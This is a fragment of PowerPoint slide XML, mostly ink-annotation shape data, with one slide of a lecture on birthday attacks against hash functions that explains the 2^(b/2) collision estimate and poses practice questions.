                <a:off x="6817353" y="2941672"/>
                <a:ext cx="236520" cy="3747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C085E11-E6CE-FE4D-88F5-2CB28407297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808353" y="2932672"/>
                  <a:ext cx="25416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2A44960-2356-8945-B061-BA46D7B97C18}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7121553" y="2858512"/>
                <a:ext cx="111240" cy="1188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2A44960-2356-8945-B061-BA46D7B97C1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12913" y="2849512"/>
                  <a:ext cx="1288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0463C94-2886-024D-A2ED-6BF947DBB653}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7181673" y="2835472"/>
                <a:ext cx="4320" cy="2001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0463C94-2886-024D-A2ED-6BF947DBB65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172673" y="2826832"/>
                  <a:ext cx="219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22306BF-EAEE-1C42-8246-24DA16AFE990}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7254753" y="2792272"/>
                <a:ext cx="110880" cy="2030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22306BF-EAEE-1C42-8246-24DA16AFE99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246113" y="2783632"/>
                  <a:ext cx="1285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C01CC28-A3A5-4F48-9845-6CFF9DDA3043}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7514313" y="3124912"/>
                <a:ext cx="360" cy="3146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C01CC28-A3A5-4F48-9845-6CFF9DDA304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505673" y="3116272"/>
                  <a:ext cx="1800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F52039A-DCEB-A848-96C7-7BA76E57A9DA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7471833" y="3101872"/>
                <a:ext cx="232560" cy="3780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F52039A-DCEB-A848-96C7-7BA76E57A9D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463193" y="3093232"/>
                  <a:ext cx="250200" cy="39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9D0B3119-3BD8-D840-BA28-904C3ECF2E7A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4652673" y="2814232"/>
              <a:ext cx="509040" cy="424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9D0B3119-3BD8-D840-BA28-904C3ECF2E7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644033" y="2805592"/>
                <a:ext cx="52668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DD01A5F9-8E02-5643-B31F-DF1C59F25368}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4707393" y="2868952"/>
              <a:ext cx="519840" cy="579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DD01A5F9-8E02-5643-B31F-DF1C59F2536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698753" y="2859952"/>
                <a:ext cx="53748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B422440F-9768-A84A-80A1-FCBF527EE750}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3414993" y="230512"/>
              <a:ext cx="1608480" cy="9619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B422440F-9768-A84A-80A1-FCBF527EE75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406353" y="221872"/>
                <a:ext cx="1626120" cy="97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18B3A83-F1A4-4245-9C39-8A2175EFBDA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3085233" y="67432"/>
            <a:ext cx="2676960" cy="1099080"/>
            <a:chOff x="3085233" y="67432"/>
            <a:chExt cx="2676960" cy="109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B694184-5B55-3F46-A25F-D4E61A963B0D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3372873" y="219712"/>
                <a:ext cx="1912680" cy="9302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B694184-5B55-3F46-A25F-D4E61A963B0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363873" y="211072"/>
                  <a:ext cx="1930320" cy="9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92BCB16-E03E-8B4E-BC18-324392CB8265}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4171353" y="127912"/>
                <a:ext cx="12600" cy="9972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92BCB16-E03E-8B4E-BC18-324392CB826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162713" y="118912"/>
                  <a:ext cx="30240" cy="10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DE497B5-2EEC-6347-9E50-0823E0A670F5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4317153" y="813712"/>
                <a:ext cx="217440" cy="3279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DE497B5-2EEC-6347-9E50-0823E0A670F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308153" y="804712"/>
                  <a:ext cx="23508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0878AD6-D1F2-2648-97B7-D9370FE3C0C1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3085233" y="67432"/>
                <a:ext cx="2676960" cy="1015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0878AD6-D1F2-2648-97B7-D9370FE3C0C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076233" y="58792"/>
                  <a:ext cx="26946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E606F48-291D-3E43-99F6-C7BB5293488C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5301753" y="173272"/>
                <a:ext cx="353520" cy="633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E606F48-291D-3E43-99F6-C7BB5293488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293113" y="164272"/>
                  <a:ext cx="3711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C007553-AE40-1642-A35F-6D342094AD55}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4172793" y="165352"/>
                <a:ext cx="71640" cy="10011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C007553-AE40-1642-A35F-6D342094AD5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163793" y="156712"/>
                  <a:ext cx="89280" cy="101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6EEE716-4FF8-4A4E-94D7-FE054FC792F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4642233" y="2765992"/>
            <a:ext cx="573120" cy="152640"/>
            <a:chOff x="4642233" y="2765992"/>
            <a:chExt cx="573120" cy="15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410798D-A240-0E4F-B53A-CB846407FFA1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4642233" y="2844832"/>
                <a:ext cx="562680" cy="338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410798D-A240-0E4F-B53A-CB846407FFA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633593" y="2836192"/>
                  <a:ext cx="5803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3169C2B-C0B8-BD44-AE9F-F00112FE6237}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4800633" y="2870392"/>
                <a:ext cx="376560" cy="482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3169C2B-C0B8-BD44-AE9F-F00112FE623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791633" y="2861392"/>
                  <a:ext cx="3942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E7EC89B-AD1F-034A-A3C6-5AF8F86D8642}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4682193" y="2765992"/>
                <a:ext cx="533160" cy="838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E7EC89B-AD1F-034A-A3C6-5AF8F86D864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673193" y="2757352"/>
                  <a:ext cx="550800" cy="10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9AE69825-4A6F-E74E-9D76-C30CE4F91A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="721833" y="5932552"/>
            <a:ext cx="1056240" cy="448920"/>
            <a:chOff x="721833" y="5932552"/>
            <a:chExt cx="1056240" cy="44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05C5A28-83B3-1E42-B42A-AD2DEB8F86DA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="721833" y="6103912"/>
                <a:ext cx="416160" cy="2775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05C5A28-83B3-1E42-B42A-AD2DEB8F86D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13193" y="6094912"/>
                  <a:ext cx="4338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0DB6BAC-8EF0-D84D-B578-88A301B43B77}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1015233" y="5998792"/>
                <a:ext cx="121680" cy="1080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0DB6BAC-8EF0-D84D-B578-88A301B43B7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06593" y="5989792"/>
                  <a:ext cx="1393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11DF9F8-E900-7946-BC09-565E4F6D5DB4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1154553" y="5981152"/>
                <a:ext cx="109440" cy="1015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11DF9F8-E900-7946-BC09-565E4F6D5DB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45913" y="5972152"/>
                  <a:ext cx="1270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2FEC7AF-86ED-E243-B107-1E689EBBC673}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1505193" y="5932552"/>
                <a:ext cx="272880" cy="3286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2FEC7AF-86ED-E243-B107-1E689EBBC67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496193" y="5923552"/>
                  <a:ext cx="290520" cy="34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6BBBED12-E761-E64C-865C-28AC2E633AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2693913" y="5993752"/>
            <a:ext cx="1073520" cy="483120"/>
            <a:chOff x="2693913" y="5993752"/>
            <a:chExt cx="1073520" cy="48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592D728-A14C-4841-A493-22B094CAB3C8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2693913" y="6116872"/>
                <a:ext cx="319680" cy="3600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592D728-A14C-4841-A493-22B094CAB3C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685273" y="6108232"/>
                  <a:ext cx="33732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4BE4AB1-F19D-874C-BCA5-7D415548CFAD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2908113" y="5993752"/>
                <a:ext cx="132840" cy="1890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4BE4AB1-F19D-874C-BCA5-7D415548CFA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899113" y="5984752"/>
                  <a:ext cx="1504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96556AA-8F1B-514F-BF18-D2F65F04EF04}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3064353" y="6012472"/>
                <a:ext cx="93960" cy="1062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96556AA-8F1B-514F-BF18-D2F65F04EF0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055713" y="6003832"/>
                  <a:ext cx="111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F1863CC-4C49-CC48-8DBE-7836E2A0BA09}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3440913" y="6143872"/>
                <a:ext cx="326520" cy="1584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F1863CC-4C49-CC48-8DBE-7836E2A0BA0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432273" y="6134872"/>
                  <a:ext cx="34416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B91C822A-32F0-3443-86FC-8774E006E56F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4778313" y="5926792"/>
            <a:ext cx="536400" cy="587520"/>
            <a:chOff x="4778313" y="5926792"/>
            <a:chExt cx="536400" cy="58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3CB9D90-445F-CA4F-BD25-6D1C2373A506}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4778313" y="6091312"/>
                <a:ext cx="286200" cy="4230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3CB9D90-445F-CA4F-BD25-6D1C2373A50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769313" y="6082312"/>
                  <a:ext cx="30384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FD8D0D4-07FA-134C-B613-86D61182ECE1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5079633" y="5958112"/>
                <a:ext cx="92880" cy="954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FD8D0D4-07FA-134C-B613-86D61182ECE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070993" y="5949112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AFDD6CA-89B2-AB46-91D3-CC29B481556D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5113473" y="5928232"/>
                <a:ext cx="4320" cy="1692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AFDD6CA-89B2-AB46-91D3-CC29B481556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104833" y="5919592"/>
                  <a:ext cx="219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81F5EB1-7FF9-F94B-ABC3-7C7DDD17B595}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5221473" y="5926792"/>
                <a:ext cx="93240" cy="1242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81F5EB1-7FF9-F94B-ABC3-7C7DDD17B59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212833" y="5918152"/>
                  <a:ext cx="110880" cy="14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0D2C0477-2884-EC44-B42B-9523D96DC37C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5720433" y="6173752"/>
            <a:ext cx="344160" cy="145800"/>
            <a:chOff x="5720433" y="6173752"/>
            <a:chExt cx="344160" cy="14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FB140C1-9DEF-EF4F-A258-CC7DDDF429D7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5720433" y="6173752"/>
                <a:ext cx="154800" cy="1440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FB140C1-9DEF-EF4F-A258-CC7DDDF429D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711793" y="6165112"/>
                  <a:ext cx="1724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5D577CD-C48A-D14C-BCBC-B91D77229828}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5956233" y="6223072"/>
                <a:ext cx="108360" cy="964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5D577CD-C48A-D14C-BCBC-B91D7722982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947233" y="6214072"/>
                  <a:ext cx="12600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0F8A80F-8EA2-BA4A-91C8-72E937DF8B91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6390033" y="6346552"/>
            <a:ext cx="236880" cy="7920"/>
            <a:chOff x="6390033" y="6346552"/>
            <a:chExt cx="236880" cy="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2718D76-26E1-B944-8FE4-D1DFC0010D92}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6390033" y="6350512"/>
                <a:ext cx="360" cy="3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2718D76-26E1-B944-8FE4-D1DFC0010D9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81033" y="63415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13428B3-0AAF-8046-8F29-917EC8D78643}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6544833" y="6346552"/>
                <a:ext cx="360" cy="3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13428B3-0AAF-8046-8F29-917EC8D7864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536193" y="63375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4AD4A72-1D3E-3941-B359-75A3CFE36E9D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6626553" y="6354112"/>
                <a:ext cx="360" cy="3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4AD4A72-1D3E-3941-B359-75A3CFE36E9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17553" y="634547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2E237F35-4EF6-0442-8FB1-432BDC4AD268}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4636473" y="6648952"/>
              <a:ext cx="726480" cy="5796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2E237F35-4EF6-0442-8FB1-432BDC4AD268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4627833" y="6639952"/>
                <a:ext cx="74412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AB8E155F-764C-7D4C-BA19-98EB35680285}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8617353" y="1249312"/>
              <a:ext cx="361440" cy="36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AB8E155F-764C-7D4C-BA19-98EB35680285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608713" y="1240672"/>
                <a:ext cx="379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18624568-CB22-234B-BFA8-DE2C2D343C89}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3224913" y="2989192"/>
              <a:ext cx="1082160" cy="3744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18624568-CB22-234B-BFA8-DE2C2D343C89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3215913" y="2980552"/>
                <a:ext cx="109980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2E85BFC9-330F-074E-BC70-CF3BC6BB2385}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4673913" y="6675952"/>
              <a:ext cx="747720" cy="36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2E85BFC9-330F-074E-BC70-CF3BC6BB2385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4664913" y="6666952"/>
                <a:ext cx="7653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516909F8-F62F-B840-A1FB-B55DB1BB2E9F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3596073" y="3338392"/>
              <a:ext cx="437760" cy="36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516909F8-F62F-B840-A1FB-B55DB1BB2E9F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3587073" y="3329752"/>
                <a:ext cx="4554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D55522CF-C74A-8A44-BD01-F2DD1A9116AB}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3565113" y="3319312"/>
              <a:ext cx="534240" cy="2700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D55522CF-C74A-8A44-BD01-F2DD1A9116AB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3556473" y="3310312"/>
                <a:ext cx="5518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A00FD5C1-94B6-E146-AD20-EE70FCFEFC7C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8628513" y="1229152"/>
              <a:ext cx="424080" cy="792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A00FD5C1-94B6-E146-AD20-EE70FCFEFC7C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8619513" y="1220512"/>
                <a:ext cx="441720" cy="2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4" name="Group 193">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B3C7C7-E02A-B64F-A915-B61813A9CC16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6624033" y="677272"/>
            <a:ext cx="2406960" cy="606960"/>
            <a:chOff x="6624033" y="677272"/>
            <a:chExt cx="2406960" cy="60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FABF5C4-B214-B744-A1CF-A1E4CC7FBBFB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6849033" y="910192"/>
                <a:ext cx="273600" cy="2574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FABF5C4-B214-B744-A1CF-A1E4CC7FBBF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840393" y="901192"/>
                  <a:ext cx="29124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B6C6604-5A73-4240-88A2-1C67D65B7D03}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7131993" y="768352"/>
                <a:ext cx="23400" cy="1314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B6C6604-5A73-4240-88A2-1C67D65B7D0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123353" y="759352"/>
                  <a:ext cx="410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CEFBE26-198E-B440-B99D-E098345B7DA2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7205073" y="720112"/>
                <a:ext cx="221760" cy="1465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CEFBE26-198E-B440-B99D-E098345B7DA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196433" y="711472"/>
                  <a:ext cx="2394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0BC36206-401C-5F4D-B210-4D0DB53FC841}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7502793" y="684832"/>
                <a:ext cx="126000" cy="1555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0BC36206-401C-5F4D-B210-4D0DB53FC84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494153" y="675832"/>
                  <a:ext cx="1436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A36DBFD1-CD0C-8D45-9755-2D9EEB9A9804}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7554993" y="765832"/>
                <a:ext cx="349560" cy="4744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A36DBFD1-CD0C-8D45-9755-2D9EEB9A980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546353" y="756832"/>
                  <a:ext cx="36720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9F89631-A8B0-014A-AECD-9E1ED2271DCD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7880433" y="935032"/>
                <a:ext cx="204480" cy="2109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9F89631-A8B0-014A-AECD-9E1ED2271DC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871793" y="926392"/>
                  <a:ext cx="2221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2B95F32-28ED-7146-8AB4-429986FCA11B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8213793" y="927472"/>
                <a:ext cx="133920" cy="208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2B95F32-28ED-7146-8AB4-429986FCA11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204793" y="918832"/>
                  <a:ext cx="1515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BD1DE74-C202-D24F-A7B9-B063234E59AE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8256993" y="1044112"/>
                <a:ext cx="35640" cy="3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BD1DE74-C202-D24F-A7B9-B063234E59A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248353" y="1035112"/>
                  <a:ext cx="53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65899DB4-05ED-0A4F-BF9E-D224B912317F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8276793" y="1024312"/>
                <a:ext cx="121680" cy="201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65899DB4-05ED-0A4F-BF9E-D224B912317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267793" y="1015312"/>
                  <a:ext cx="1393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1A74548-AC2C-D542-B5EC-FF21F3B266B3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8451753" y="866632"/>
                <a:ext cx="294840" cy="2610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1A74548-AC2C-D542-B5EC-FF21F3B266B3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442753" y="857992"/>
                  <a:ext cx="3124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7206F43-6DF5-AD4B-B615-04F10DD0F023}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8647593" y="752152"/>
                <a:ext cx="59400" cy="1382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7206F43-6DF5-AD4B-B615-04F10DD0F02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638593" y="743152"/>
                  <a:ext cx="770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FFC1992-411A-FE48-9454-83F6EF92F0AA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8706633" y="729112"/>
                <a:ext cx="183240" cy="1159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FFC1992-411A-FE48-9454-83F6EF92F0A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697633" y="720472"/>
                  <a:ext cx="2008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2F07C58-9CE5-314A-B30E-2D7BEFC6036D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8885553" y="678352"/>
                <a:ext cx="145440" cy="1929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2F07C58-9CE5-314A-B30E-2D7BEFC6036D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876913" y="669352"/>
                  <a:ext cx="1630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7D2A2CEF-9706-F847-B9EC-C5DB3013D59E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6624033" y="677272"/>
                <a:ext cx="2315520" cy="6069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7D2A2CEF-9706-F847-B9EC-C5DB3013D59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615033" y="668632"/>
                  <a:ext cx="2333160" cy="62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0FDBB023-EEA7-3E4F-A7F4-C4457DA5BFD2}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4673913" y="6716632"/>
              <a:ext cx="803880" cy="9288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0FDBB023-EEA7-3E4F-A7F4-C4457DA5BFD2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4664913" y="6707992"/>
                <a:ext cx="821520" cy="110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BC6DB-9B8A-CB45-80DF-1EB887B29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Birthday Attacks on Hash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9012E-65E2-3A41-9673-AE31013E27A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Now matter how good your hash function is, there is always a “birthday attack” that works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Named after the so-called “birthday paradox”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here “works” means it will find a collision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But may take a VERRRRY long time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Birthday attack just tries random inputs and tabulates the outputs until a collision occurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If your hash has b bits, it will take an expected sqrt(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) = 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>b/2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hash invocations (approximately)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So if I have a 32-bit hash function, how many items do I have to hash before I expect a collision?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How about for a 64-bit hash function?  How about MD5?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7A20AD-A45E-6B44-80B4-E1E6148A095B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7090593" y="4587592"/>
              <a:ext cx="982800" cy="4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7A20AD-A45E-6B44-80B4-E1E6148A09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81953" y="4578952"/>
                <a:ext cx="100044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0361E76-5D54-A646-8B31-CA8BF57EDA92}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3060393" y="5105272"/>
              <a:ext cx="2296440" cy="35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0361E76-5D54-A646-8B31-CA8BF57EDA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51393" y="5096272"/>
                <a:ext cx="23140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C04310A-9812-5540-97BD-5FE5C9090A9E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3344793" y="5761912"/>
              <a:ext cx="2592720" cy="138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C04310A-9812-5540-97BD-5FE5C9090A9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36153" y="5753272"/>
